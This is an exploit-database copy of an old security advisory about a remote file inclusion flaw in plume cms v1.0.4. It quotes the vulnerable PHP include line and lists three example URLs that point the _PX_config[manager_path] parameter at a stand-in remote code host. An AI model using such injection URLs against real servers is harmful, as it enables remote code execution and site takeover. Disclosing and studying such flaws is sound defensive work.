Advertisement






plume-cms v1.0.4 Multiple Remote File include

CVE Category Price Severity
CVE-2007-3965 CWE-829 $500 High
Author Risk Exploitation Type Date
nuTc4k High Remote 2006-07-25
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070071

Below is a copy:

plume cms  v1.0.4 Multiple Remote File include

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

Arabian Security Team

-------------------------------------------------

site of script:http://www.plume-cms.net/

-------------------------------------------------

Vulnerable: plume cms  v1.0.4

-------------------------------------------------

vulnerable code:

----------------------

include $_PX_config['manager_path'].'/frontinc/class.template.php';

_PX_config[manager_path] parameter File include

------------------------------------------------------------------------
-----------------------------------------------------------------

vulnerable files  :

--------------------

index.php

rss.php

search.php

-------------------------------------------------

example:

www.example.com/(path)/index.php?_PX_config[manager_path]=http://evilcod
e.txt?

www.example.com/(path)/rss.php?_PX_config[manager_path]=http://evilcode.
txt?

www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilco
de.txt?

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

E-mail:KARKOR23 (at) hotmail (dot) com [email concealed]

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALM
OKAN3, mr-hcr AND ALL LEZR.COM Member

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum